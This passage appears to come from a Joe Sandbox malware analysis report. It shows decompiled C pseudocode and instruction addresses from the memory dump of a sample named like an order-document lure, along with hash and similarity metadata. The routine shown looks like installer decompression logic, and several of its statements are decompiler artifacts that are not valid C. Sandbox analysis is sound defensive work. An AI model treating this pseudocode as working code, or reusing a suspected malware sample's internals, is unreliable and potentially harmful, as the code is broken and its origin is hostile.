														if( *(__ebp - 0x10) >= 0x1000000) {
															continue;
														} else {
															__eflags =  *(__ebp - 0x6c);
															if( *(__ebp - 0x6c) == 0) {
																 *((intOrPtr*)(__ebp - 0x88)) = 0xe;
																goto L138;
															} else {
																__ecx =  *(__ebp - 0x70);
																__eax =  *(__ebp - 0xc);
																 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
																__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
																 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
																 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
																_t156 = __ebp - 0x70;
																 *_t156 =  *(__ebp - 0x70) + 1;
																__eflags =  *_t156;
																 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
																continue;
															}
														}
														goto L140;
													}
													goto L54;
												} else {
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														L54:
														_t173 = __ebp - 0x34;
														 *_t173 =  *(__ebp - 0x34) & 0x00000000;
														__eflags =  *_t173;
														L55:
														__al =  *(__ebp - 0x44);
														 *(__ebp - 0x5c) =  *(__ebp - 0x44);
														__eflags =  *(__ebp - 0x64);
														if( *(__ebp - 0x64) == 0) {
															 *((intOrPtr*)(__ebp - 0x88)) = 0x1a;
															L138:
															_push(0x22);
															_pop(_t487);
															memcpy( *(_t532 - 0x90), _t532 - 0x88, _t487 << 2);
															_t454 = 0;
														} else {
															__ecx =  *(__ebp - 0x68);
															__al =  *(__ebp - 0x5c);
															__edx =  *(__ebp - 8);
															 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
															 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
															 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
															 *( *(__ebp - 0x68)) = __al;
															__ecx =  *(__ebp - 0x14);
															 *(__ecx +  *(__ebp - 8)) = __al;
															__eax = __ecx + 1;
															__edx = 0;
															_t192 = __eax %  *(__ebp - 0x74);
															__eax = __eax /  *(__ebp - 0x74);
															__edx = _t192;
															goto L77;
														}
													} else {
														L41:
														__eax =  *(__ebp - 0x5b) & 0x000000ff;
														 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
														__ecx =  *(__ebp - 0x58);
														__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
														 *(__ebp - 0x48) = __eax;
														__eax = __eax + 1;
														__eax = __eax << 8;
														__eax = __eax + __ebx;
														__esi =  *(__ebp - 0x58) + __eax * 2;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__ax =  *__esi;
														 *(__ebp - 0x54) = __esi;
														__edx = __ax & 0x0000ffff;
														__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
														__eflags =  *(__ebp - 0xc) - __ecx;
														if( *(__ebp - 0xc) >= __ecx) {
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
															__cx = __ax;
															 *(__ebp - 0x40) = 1;
															__cx = __ax >> 5;
															__eflags = __eax;
															__ebx = __ebx + __ebx + 1;
															 *__esi = __ax;
														} else {
															 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
															 *(__ebp - 0x10) = __ecx;
															0x800 = 0x800 - __edx;
															0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
															__ebx = __ebx + __ebx;
															 *__esi = __cx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														 *(__ebp - 0x44) = __ebx;
														if( *(__ebp - 0x10) >= 0x1000000) {
															goto L39;
														} else {
															goto L37;
														}
													}
												}
											}
											goto L140;
									}
								}
							}
						}
					}
					L140:
					return _t454;
				}
			}

0x00000000
0x00406a71
0x00406a71
0x00406a75
0x00406b2c
0x00406b2f
0x00406b3b
0x00000000
0x00406a7b
0x00406a7f
0x00406fc0
0x00406fc0
0x00406a85
0x00406a85
0x00406a8e
0x00406a92
0x00406a99
0x00406f5f
0x00000000
0x00406a9f
0x00406a9f
0x00406aa2
0x00406aa8
0x00406aaa
0x00406aaa
0x00406aad
0x00406ab0
0x00406ab3
0x00406ab6
0x00406ab9
0x00406abc
0x00406abd
0x00406abf
0x00406abf
0x00406abf
0x00406ac2
0x00406ac5
0x00406ac8
0x00406acb
0x00406acb
0x00406ace
0x00406ad0
0x00406ad0
0x00406ad3
0x00406ad3
0x004065a9
0x004065a9
0x004065b2
0x00000000
0x004065b8
0x004065b8
0x00000000
0x004065c3
0x00000000
0x004065c9
0x004065cc
0x004065cf
0x004065d2
0x004065d6
0x00000000
0x004065dc
0x004065dc
0x004065df
0x004065e1
0x004065e2
0x004065e5
0x004065e7
0x004065e8
0x004065ea
0x004065ed
0x004065f2
0x004065f7
0x00406600
0x00406613
0x00406616
0x00406622
0x0040664a
0x0040664c
0x0040664e
0x00406651
0x00406652
0x00406652
0x0040664e
0x0040665a
0x0040665e
0x00000000
0x00406624
0x00406628
0x0040662d
0x0040662d
0x00406636
0x0040663e
0x00406641
0x00000000
0x00406647
0x00406647
0x00000000
0x00406647
0x00406641
0x00406622
0x004065d6
0x00000000
0x00000000
0x00406664
0x00406664
0x00406668
0x00406f14
0x00000000
0x0040666e
0x00406671
0x00406681
0x00406684
0x00406687
0x00406687
0x00406687
0x0040668a
0x0040668e
0x00000000
0x00406690
0x00406690
0x00406696
0x004066c0
0x004066c6
0x004066cd
0x00000000
0x00406698
0x0040669c
0x0040669f
0x004066a4
0x004066a4
0x004066af
0x004066b7
0x004066ba
0x00000000
0x00000000
0x00000000
0x00000000
0x004066ba
0x00406696
0x0040668e
0x00000000
0x00000000
0x004066ff
0x00406705
0x00406708
0x00406715
0x0040671d
0x00000000
0x00000000
0x004066d4
0x004066d4
0x004066d8
0x00406f23
0x00000000
0x004066de
0x004066e4
0x004066ef
0x004066ef
0x004066ef
0x004066f2
0x004066f5
0x004066f8
0x004066fd
0x00000000
0x00000000
0x00000000
0x00000000
0x004066fd
0x00000000
0x00000000
0x00406d94
0x00406d94
0x00406d9a
0x00406da0
0x00406da6
0x00406dc0
0x00406dc3
0x00406dc9
0x00406dd4
0x00406dd4
0x00406dd6
0x00406da8
0x00406da8
0x00406db7
0x00406dbb
0x00406dbb
0x00406de0
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406de2
0x00406de6
0x00406f95
0x00000000
0x00406dec
0x00406df2
0x00406df9
0x00406e01
0x00406e04
0x00406e07
0x00406e07
0x00406e0d
0x00000000
0x00406e0d
0x00000000
0x00000000
0x00406725
0x00406727
0x0040672a
0x0040679b
0x0040679e
0x004067a1
0x004067a8
0x004067b2
0x00000000
0x0040672c
0x0040672c
0x00406730
0x00406733
0x00406735
0x00406738
0x0040673b
0x0040673d
0x00406740
0x00406742
0x00406747
0x0040674a
0x0040674d
0x00406751
0x00406758
0x0040675b
0x00406762
0x00406766
0x0040676e
0x0040676e
0x0040676e
0x00406768
0x00406768
0x00406768
0x0040675d
0x0040675d
0x0040675d
0x00406772
0x00406775
0x00406793
0x00406795
0x00406968
0x00406968
0x0040696b
0x0040696e
0x00406971
0x00406974
0x00406977
0x0040697a
0x0040697d
0x00406980
0x00406983
0x00406986
0x0040699e
0x004069a1
0x004069a4
0x004069a7
0x004069a7
0x004069aa
0x004069ae
0x004069b0
0x00406988
0x00406988
0x00406990
0x00406995
0x00406997
0x00406999
0x00406999
0x004069b3
0x004069ba
0x004069bd
0x00000000
0x004069bf
0x0040693b
0x0040693f
0x00406f47
0x00000000
0x00406945
0x00406945
0x00406948
0x0040694b
0x0040694f
0x00406952
0x00406958
0x0040695a
0x0040695a
0x0040695a
0x0040695d
0x00000000
0x0040695d
0x0040693f
0x00000000
0x00406960
0x00406960
0x00406960
0x00000000
0x00406777
0x00406777
0x0040677a
0x0040677d
0x00406780
0x00406782
0x00406782
0x00406782
0x00406785
0x00406788
0x0040678a
0x0040678b
0x0040678e
0x00000000
0x0040678e
0x00406775
0x00000000
0x00000000
0x004069c4
0x004069c8
0x004069e6
0x004069e9
0x004069f0
0x004069f3
0x004069f6
0x004069f9
0x004069fc
0x004069ff
0x00406a01
0x00406a08
0x00406a09
0x00406a0b
0x00406a0e
0x00406a11
0x00406a14
0x00406a14
0x00406a19
0x00406a1c
0x00406a1c
0x00406a1f
0x004069ca
0x004069ca
0x004069cd
0x004069d0
0x004069da
0x004069da
0x00000000
0x00000000
0x00406a2e
0x00406a32
0x00406a55
0x00406a58
0x00406a5b
0x00406a65
0x00406a34
0x00406a34
0x00406a37
0x00406a3a
0x00406a3d
0x00406a4a
0x00406a4d
0x00406a4d
0x00000000
0x00000000
0x00000000
0x00000000
0x00406ae2
0x00406ae6
0x00406aed
0x00406af0
0x00406af3
0x00406afd
0x00406ae8
0x00406ae8
0x00000000
0x00406ae8
0x00406d91
0x00406d91
0x00000000
0x00000000
0x00406b09
0x00406b0d
0x00406b14
0x00406b17
0x00406b1a
0x00406b0f
0x00406b0f
0x00406b0f
0x00406b1d
0x00406b20
0x00406b23
0x00406b23
0x00406b26
0x00406b29
0x00000000
0x00000000
0x00406bc9
0x00406bc9
0x00406bc9
0x00406bcd
0x00000000
0x00000000
0x00406bd3
0x00406bd6
0x00406bd9
0x00406bdd
0x00406be0
0x00406be6
0x00406be8
0x00406be8
0x00406be8
0x00406beb
0x00406bee
0x00406bf1
0x00406bf1
0x00406bf1
0x00406bf1
0x00406bf4
0x00406bf8
0x00000000
0x00000000
0x00406bfa
0x00406bfd
0x00406bff
0x00406c02
0x00406c05
0x00406c08
0x00406c0a
0x00406c0d
0x00406c10
0x00406c10
0x00406c13
0x00406c13
0x00406c16
0x00406c1d
0x00000000
0x00406c1f
0x00000000
0x00406c1f
0x00000000
0x00406c1d
0x00406c24
0x00406c26
0x00406c2d
0x00406c30
0x00406c33
0x00406c33
0x00406c38
0x00406c3a
0x00406c3d
0x00406c44
0x00406c47
0x00406c74
0x00406c74
0x00406c77
0x00406c7a
0x00000000
0x00000000
0x00406c7c
0x00406c82
0x00406c85
0x00406c88
0x00406c8b
0x00406c8e
0x00406c91
0x00406c94
0x00406c97
0x00406c9a
0x00406c9d
0x00406cb6
0x00406cb8
0x00406cbb
0x00406cbc
0x00406cbf
0x00406cc1
0x00406cc4
0x00406cc6
0x00406cc8
0x00406ccb
0x00406ccd
0x00406cd0
0x00406cd4
0x00406cd6
0x00406cd6
0x00406cd7
0x00406cda
0x00406cdd
0x00406c9f
0x00406c9f
0x00406ca7
0x00406cac
0x00406cae
0x00406cb1
0x00406cb1
0x00406ce0
0x00406ce7
0x00406c71
0x00406c71
0x00406c71
0x00406c71
0x00000000
0x00406ce9
0x00406c4c
0x00406c50
0x00406f77
0x00000000
0x00406c56
0x00406c56
0x00406c59
0x00406c5c
0x00406c60
0x00406c63
0x00406c69
0x00406c6b
0x00406c6b
0x00406c6b
0x00406c6e
0x00000000
0x00406c6e
0x00406c50
0x00000000
0x00406ce7
0x00406cee
0x00406cee
0x00406cee
0x00406cf1
0x00406cf1
0x00406cf1
0x00406cf4
0x00406cf7
0x00406cf9
0x00406f83
0x00000000
0x00406cff
0x00406cff
0x00406d02
0x00000000
0x00406d08
0x00406d08
0x00406d0c
0x00406d0f
0x00406d0f
0x00406d0f
0x00406d12
0x00406d12
0x00406d16
0x00000000
0x00000000
0x00406d1c
0x00406d1f
0x00406d22
0x00406d25
0x00406d27
0x00406d27
0x00406d27
0x00406d2a
0x00406d2d
0x00406d30
0x00406d33
0x00406d36
0x00406d39
0x00406d3a
0x00406d3c
0x00406d3c
0x00406d3c
0x00406d3f
0x00406d42
0x00406d45
0x00406d48
0x00406d4b
0x00406d4f
0x00406d51
0x00406d54
0x00000000
0x00406d56
0x00000000
0x00406d56
0x00000000
0x00406d54
0x00406f89
0x00000000
0x00406f89
0x00406d02
0x00000000
0x00406cf9
0x00406f6b
0x00000000
0x00000000
0x004067be
0x004067be
0x004067c2
0x00406f2f
0x00000000
0x004067c8
0x004067c8
0x004067cb
0x004067ce
0x004067d2
0x004067d5
0x004067db
0x004067dd
0x004067dd
0x004067dd
0x004067e0
0x004067e3
0x004067e3
0x004067e6
0x004067e9
0x0040689c
0x0040689c
0x004068a2
0x00000000
0x00000000
0x004068a4
0x004068a7
0x004068aa
0x004068ad
0x004068b0
0x004068b3
0x004068b6
0x004068b9
0x004068bc
0x004068bf
0x004068c2
0x004068da
0x004068dd
0x004068e0
0x004068e3
0x004068e3
0x004068e6
0x004068ea
0x004068ec
0x004068c4
0x004068c4
0x004068cc
0x004068d1
0x004068d3
0x004068d5
0x004068d5
0x004068ef
0x004068f6
0x004068f9
0x00000000
0x004068fb
0x00406877
0x0040687b
0x00406f3b
0x00000000
0x00406881
0x00406881
0x00406884
0x00406887
0x0040688b
0x0040688e
0x00406894
0x00406896
0x00406896
0x00406896
0x00406899
0x00000000
0x00406899
0x0040687b
0x00000000
0x004068f9
0x00000000
0x004067ef
0x004067ef
0x004067f5
0x00406900
0x00406900
0x00406900
0x00406900
0x00406904
0x00406904
0x00406907
0x0040690a
0x0040690e
0x00406f53
0x00406fab
0x00406fb1
0x00406fb3
0x00406fba
0x00406fbc
0x00406914
0x00406914
0x00406917
0x0040691a
0x0040691d
0x00406920
0x00406923
0x00406926
0x00406928
0x0040692b
0x0040692e
0x00406931
0x00406933
0x00406933
0x00406933
0x00000000
0x00406933
0x004067fb
0x004067fb
0x004067fb
0x004067ff
0x00406802
0x00406805
0x00406808
0x0040680b
0x0040680c
0x0040680f
0x00406811
0x00406817
0x0040681a
0x0040681d
0x00406820
0x00406823
0x00406826
0x00406829
0x00406845
0x00406848
0x0040684b
0x0040684e
0x00406855
0x00406859
0x0040685b
0x0040685f
0x0040682b
0x0040682b
0x0040682f
0x00406837
0x0040683c
0x0040683e
0x00406840
0x00406840
0x00406862
0x00406869
0x0040686c
0x00000000
0x00406872
0x00000000
0x00406872
0x0040686c
0x004067f5
0x004067e9
0x00000000
0x00000000
0x004065b8
0x004065b2
0x00406a99
0x00406a7f
0x00406fc3
0x00406fc7
0x00406fc7

Memory Dump Source

Source File: 00000002.00000002.23339788860.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.23339766481.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23339840163.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23339868673.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340031143.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340074688.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340113009.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340161078.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340206853.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Order_002376662-579588_Date 24082022.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec7db08be09974c8046cad88b73edbb403e33193446cf3f9fa5a5555e34d97c1
Instruction ID: 723f18ff0051ee6ad4f375e9cb18d989a687bb59657bcd06a5bbc8819a965d11
Opcode Fuzzy Hash: ec7db08be09974c8046cad88b73edbb403e33193446cf3f9fa5a5555e34d97c1
Instruction Fuzzy Hash: F5814371E00229CFDF24CFA8C8847ADBBB1FB44305F25856AD416BB281C7389A96DF44

Uniqueness

Uniqueness Score: -1.00%

Function 004069C4 Relevance: 5.2, APIs: 4, Instructions: 180
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E004069C4(void* __ebx) {
				unsigned short _t458;
				void _t460;
				signed int _t461;
				signed int _t462;
				signed int _t492;
				signed int _t495;
				signed int _t516;
				short* _t533;
				void* _t540;

				L0:
				while(1) {
					L0:
					if( *(_t540 - 0x40) != 1) {
						 *((intOrPtr*)(_t540 - 0x80)) = 0x16;
						 *((intOrPtr*)(_t540 - 0x20)) =  *((intOrPtr*)(_t540 - 0x24));
						 *((intOrPtr*)(_t540 - 0x24)) =  *((intOrPtr*)(_t540 - 0x28));
						 *((intOrPtr*)(_t540 - 0x28)) =  *((intOrPtr*)(_t540 - 0x2c));
						 *(_t540 - 0x38) = ((0 |  *(_t540 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
						 *((intOrPtr*)(_t540 - 0x58)) =  *(_t540 - 4) + 0x664;
						goto L67;
					} else {
						 *((intOrPtr*)(__ebp - 0x84)) = 8;
						while(1) {
							L117:
							 *((intOrPtr*)(_t540 - 0x54)) = _t533;
							while(1) {
								L118:
								_t458 =  *_t533;
								_t516 = _t458 & 0x0000ffff;
								_t492 = ( *(_t540 - 0x10) >> 0xb) * _t516;
								if( *(_t540 - 0xc) >= _t492) {
									 *(_t540 - 0x10) =  *(_t540 - 0x10) - _t492;
									 *(_t540 - 0xc) =  *(_t540 - 0xc) - _t492;
									 *(_t540 - 0x40) = 1;
									 *_t533 = _t458 - (_t458 >> 5);
								} else {
									 *(_t540 - 0x10) = _t492;
									 *(_t540 - 0x40) =  *(_t540 - 0x40) & 0x00000000;
									 *_t533 = (0x800 - _t516 >> 5) + _t458;
								}
								L121:
								if( *(_t540 - 0x10) >= 0x1000000) {
									L124:
									_t460 =  *(_t540 - 0x84);
									 *(_t540 - 0x88) = _t460;
									while(1) {
										L1:
										_t461 =  *(_t540 - 0x88);
										if(_t461 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t461 * 4 +  &M00406FC8))) {
											case 0:
												if( *((intOrPtr*)(_t540 - 0x6c)) == 0) {
													goto L138;
												} else {
													 *((intOrPtr*)(_t540 - 0x6c)) =  *((intOrPtr*)(_t540 - 0x6c)) - 1;
													 *(_t540 - 0x70) =  &(( *(_t540 - 0x70))[1]);
													_t461 =  *( *(_t540 - 0x70));
													if(_t461 > 0xe1) {
														goto L139;
													} else {
														_t465 = _t461 & 0x000000ff;
														_push(0x2d);
														asm("cdq");
														_pop(_t497);
														_push(9);
														_pop(_t498);
														_t536 = _t465 / _t497;
														_t467 = _t465 % _t497 & 0x000000ff;
														asm("cdq");
														_t531 = _t467 % _t498 & 0x000000ff;
														 *(_t540 - 0x3c) = _t531;
														 *(_t540 - 0x1c) = (1 << _t536) - 1;
														 *((intOrPtr*)(_t540 - 0x18)) = (1 << _t467 / _t498) - 1;
														_t539 = (0x300 << _t531 + _t536) + 0x736;
														if(0x600 ==  *((intOrPtr*)(_t540 - 0x78))) {
															L10:
															if(_t539 != 0) {
																do {
																	_t539 = _t539 - 1;
																	 *((short*)( *(_t540 - 4) + _t539 * 2)) = 0x400;
																} while (_t539 != 0);
															}
															 *(_t540 - 0x48) =  *(_t540 - 0x48) & 0x00000000;
															 *(_t540 - 0x40) =  *(_t540 - 0x40) & 0x00000000;
															goto L15;
														} else {
															if( *(_t540 - 4) != 0) {
																GlobalFree( *(_t540 - 4));
															}
															_t461 = GlobalAlloc(0x40, 0x600); // executed
															 *(_t540 - 4) = _t461;
															if(_t461 == 0) {
																goto L139;
															} else {
																 *((intOrPtr*)(_t540 - 0x78)) = 0x600;
																goto L10;
															}
														}
													}
												}
												goto L140;
											case 1:
												L13:
												if( *((intOrPtr*)(_t540 - 0x6c)) == 0) {
													 *(_t540 - 0x88) = 1;
													goto L138;
												} else {
													 *((intOrPtr*)(_t540 - 0x6c)) =  *((intOrPtr*)(_t540 - 0x6c)) - 1;
													 *(_t540 - 0x40) =  *(_t540 - 0x40) | ( *( *(_t540 - 0x70)) & 0x000000ff) <<  *(_t540 - 0x48) << 0x00000003;
													 *(_t540 - 0x70) =  &(( *(_t540 - 0x70))[1]);
													 *(_t540 - 0x48) =  *(_t540 - 0x48) + 1;
													L15:
													if( *(_t540 - 0x48) < 4) {
														goto L13;
													} else {
														_t473 =  *(_t540 - 0x40);
														if(_t473 ==  *(_t540 - 0x74)) {
															L20:
															 *(_t540 - 0x48) = 5;
															 *( *(_t540 - 8) +  *(_t540 - 0x74) - 1) =  *( *(_t540 - 8) +  *(_t540 - 0x74) - 1) & 0x00000000;
															goto L23;
														} else {
															 *(_t540 - 0x74) = _t473;
															if( *(_t540 - 8) != 0) {
																GlobalFree( *(_t540 - 8));
															}
															_t461 = GlobalAlloc(0x40,  *(_t540 - 0x40)); // executed
															 *(_t540 - 8) = _t461;
															if(_t461 == 0) {
																goto L139;
															} else {
																goto L20;
															}
														}
													}
												}
												goto L140;
											case 2:
												L24:
												_t480 =  *(_t540 - 0x60) &  *(_t540 - 0x1c);
												 *(_t540 - 0x84) = 6;
												 *(_t540 - 0x4c) = _t480;
												_t533 =  *(_t540 - 4) + (( *(_t540 - 0x38) << 4) + _t480) * 2;
												goto L117;
											case 3:
												L21:
												if( *((intOrPtr*)(_t540 - 0x6c)) == 0) {
													 *(_t540 - 0x88) = 3;
													goto L138;
												} else {
													 *((intOrPtr*)(_t540 - 0x6c)) =  *((intOrPtr*)(_t540 - 0x6c)) - 1;
													 *(_t540 - 0x70) =  &(( *(_t540 - 0x70))[1]);
													 *(_t540 - 0xc) =  *(_t540 - 0xc) << 0x00000008 |  *( *(_t540 - 0x70)) & 0x000000ff;
													L23:
													 *(_t540 - 0x48) =  *(_t540 - 0x48) - 1;
													if( *(_t540 - 0x48) != 0) {
														goto L21;
													} else {
														goto L24;
													}
												}
												goto L140;
											case 4:
												L118:
												_t458 =  *_t533;
												_t516 = _t458 & 0x0000ffff;
												_t492 = ( *(_t540 - 0x10) >> 0xb) * _t516;
												if( *(_t540 - 0xc) >= _t492) {
													 *(_t540 - 0x10) =  *(_t540 - 0x10) - _t492;
													 *(_t540 - 0xc) =  *(_t540 - 0xc) - _t492;
													 *(_t540 - 0x40) = 1;
													 *_t533 = _t458 - (_t458 >> 5);
												} else {
													 *(_t540 - 0x10) = _t492;
													 *(_t540 - 0x40) =  *(_t540 - 0x40) & 0x00000000;
													 *_t533 = (0x800 - _t516 >> 5) + _t458;
												}
												goto L121;
											case 5:
												goto L122;
											case 6:
												__edx = 0;
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *((intOrPtr*)(__ebp - 0x84)) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													goto L117;
												} else {
													__eax =  *(__ebp - 0x5c) & 0x000000ff;
													__esi =  *(__ebp - 0x60);
													__cl = 8;
													__cl = 8 -  *(__ebp - 0x3c);
													__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
													__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
													__ecx =  *(__ebp - 0x3c);
													__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
													__ecx =  *(__ebp - 4);
													(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
													(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9 = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
													 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
													if( *(__ebp - 0x38) >= 4) {
														if( *(__ebp - 0x38) >= 0xa) {
															 *(__ebp - 0x38) =  *(__ebp - 0x38) - 6;
														} else {
															 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
														}
													} else {
														 *(__ebp - 0x38) = 0;
													}
													if( *(__ebp - 0x34) == __edx) {
														__ebx = 0;
														__ebx = 1;
														do {
															__eax =  *(__ebp - 0x58);
															__edx = __ebx + __ebx;
															__ecx =  *(__ebp - 0x10);
															__esi = __edx + __eax;
															__ecx =  *(__ebp - 0x10) >> 0xb;
															__ax =  *__esi;
															 *(__ebp - 0x54) = __esi;
															__edi = __ax & 0x0000ffff;
															__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
															if( *(__ebp - 0xc) >= __ecx) {
																 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
																 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
																__cx = __ax;
																_t217 = __edx + 1; // 0x1
																__ebx = _t217;
																__cx = __ax >> 5;
																__eax = __eax - __ecx;
																 *__esi = __ax;
															} else {
																 *(__ebp - 0x10) = __ecx;
																0x800 = 0x800 - __edi;
																0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
																__ebx = __ebx + __ebx;
																 *__esi = __cx;
															}
															 *(__ebp - 0x44) = __ebx;
															if( *(__ebp - 0x10) >= 0x1000000) {
																goto L59;
															} else {
																if( *((intOrPtr*)(__ebp - 0x6c)) == 0) {
																	 *((intOrPtr*)(__ebp - 0x88)) = 0xf;
																	goto L138;
																} else {
																	__ecx =  *(__ebp - 0x70);
																	__eax =  *(__ebp - 0xc);
																	 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
																	__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
																	 *((intOrPtr*)(__ebp - 0x6c)) =  *((intOrPtr*)(__ebp - 0x6c)) - 1;
																	 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
																	 *(__ebp - 0x70) =  *(__ebp - 0x70) + 1;
																	 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
																	goto L59;
																}
															}
															goto L140;
															L59:
														} while (__ebx < 0x100);
														goto L55;
													} else {
														__eax =  *(__ebp - 0x14);
														__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
														if(__eax >=  *(__ebp - 0x74)) {
															__eax = __eax +  *(__ebp - 0x74);
														}
														__ecx =  *(__ebp - 8);
														__ebx = 0;
														__ebx = 1;
														__al =  *((intOrPtr*)(__eax + __ecx));
														 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
														goto L41;
													}
												}
												goto L140;
											case 7:
												goto L0;
											case 8:
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *((intOrPtr*)(__ebp - 0x84)) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *((intOrPtr*)(__ebp - 0x84)) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *((intOrPtr*)(__ebp - 0x4c));
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *((intOrPtr*)(__ebp - 0x4c))) * 2;
												}
												goto L117;
											case 9:
												if( *(__ebp - 0x40) != 0) {
													goto L87;
												} else {
													if( *(__ebp - 0x60) == 0) {
														goto L139;
													} else {
														0 = 0 |  *(__ebp - 0x38) - 0x00000007 >= 0x00000000;
														__eax = ( *(__ebp - 0x38) - 7 >= 0) + ( *(__ebp - 0x38) - 7 >= 0) + 9;
														 *(__ebp - 0x38) = ( *(__ebp - 0x38) - 7 >= 0) + ( *(__ebp - 0x38) - 7 >= 0) + 9;
														if( *((intOrPtr*)(__ebp - 0x64)) == 0) {
															 *((intOrPtr*)(__ebp - 0x88)) = 0x1b;
															goto L138;
														} else {
															__eax =  *(__ebp - 0x14);
															__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
															if(__eax >=  *(__ebp - 0x74)) {
																__eax = __eax +  *(__ebp - 0x74);
															}
															__edx =  *(__ebp - 8);
															__cl =  *(__eax + __edx);
															__eax =  *(__ebp - 0x14);
															 *(__ebp - 0x5c) = __cl;
															 *(__eax + __edx) = __cl;
															__eax = __eax + 1;
															__edx = 0;
															_t274 = __eax %  *(__ebp - 0x74);
															__eax = __eax /  *(__ebp - 0x74);
															__edx = _t274;
															__eax =  *(__ebp - 0x68);
															 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
															 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
															 *((intOrPtr*)(__ebp - 0x64)) =  *((intOrPtr*)(__ebp - 0x64)) - 1;
															 *( *(__ebp - 0x68)) = __cl;
															goto L77;
														}
													}
												}
												goto L140;
											case 0xa:
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *((intOrPtr*)(__ebp - 0x84)) = 0xb;
